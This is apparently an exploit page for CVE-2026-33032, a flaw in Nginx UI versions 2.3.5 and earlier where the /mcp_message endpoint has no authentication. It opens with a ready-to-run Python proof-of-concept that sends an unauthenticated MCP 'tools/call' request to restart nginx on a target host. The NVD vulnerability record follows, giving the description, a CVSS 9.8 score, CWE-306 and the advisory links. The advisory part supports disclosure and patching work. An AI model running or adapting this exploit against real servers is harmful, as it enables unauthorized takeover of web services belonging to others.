CVE-2026-33032

import requests import json # Target configuration target_host = "http://<target-ip>:<port>" endpoint = "/mcp_message" url = target_host + endpoint # Payload structure based on MCP tool invocation # This example attempts to restart the nginx service payload = { "method": "tools/call", "params": { "name": "restart_nginx", "arguments": {} } } headers = { "Content-Type": "application/json" } try: # Sending request without authentication headers response = requests.post(url, data=json.dumps(payload), headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Server response:") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-33032", "sourceIdentifier": "[email protected]", "published": "2026-03-30T18:16:19.410", "lastModified": "2026-04-16T22:16:37.433", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nginx UI is a web user interface for the Nginx web server. In versions 2.3.5 and prior, the nginx-ui MCP (Model Context Protocol) integration exposes two HTTP endpoints: /mcp and /mcp_message. While /mcp requires both IP whitelisting and authentication (AuthRequired() middleware), the /mcp_message endpoint only applies IP whitelisting - and the default IP whitelist is empty, which the middleware treats as \"allow all\". This means any network attacker can invoke all MCP tools without authentication, including restarting nginx, creating/modifying/deleting nginx configuration files, and triggering automatic config reloads - achieving complete nginx service takeover. At time of publication, there are no publicly available patches."}, {"lang": "es", "value": "Nginx UI es una interfaz de usuario web para el servidor web Nginx. En las versiones 2.3.5 y anteriores, la integración MCP (Model Context Protocol) de nginx-ui expone dos puntos finales HTTP: /mcp y /mcp_message. Mientras que /mcp requiere tanto la lista blanca de IP como la autenticación (middleware AuthRequired()), el punto final /mcp_message solo aplica la lista blanca de IP, y la lista blanca de IP predeterminada está vacía, lo que el middleware trata como 'permitir todo'. Esto significa que cualquier atacante de red puede invocar todas las herramientas MCP sin autenticación, incluyendo reiniciar nginx, crear/modificar/eliminar archivos de configuración de nginx y activar recargas automáticas de configuración, logrando una toma de control completa del servicio nginx. En el momento de la publicación, no hay parches disponibles públicamente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nginxui:nginx_ui:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.3.5", "matchCriteriaId": "DAD68C0D-27F9-48C7-8D1A-05EF5E2F7F7B"}]}]}], "references": [{"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://websec.net/blog/cve-2026-33032-unauthenticated-nginx-ui-mcp-takeover-69e1200f9fceb1f3fbe9c47f", "source": "af854a3a-2127-422b-91ae-364da2661108"}, {"url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-h6c2-x2m2-mwhf", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}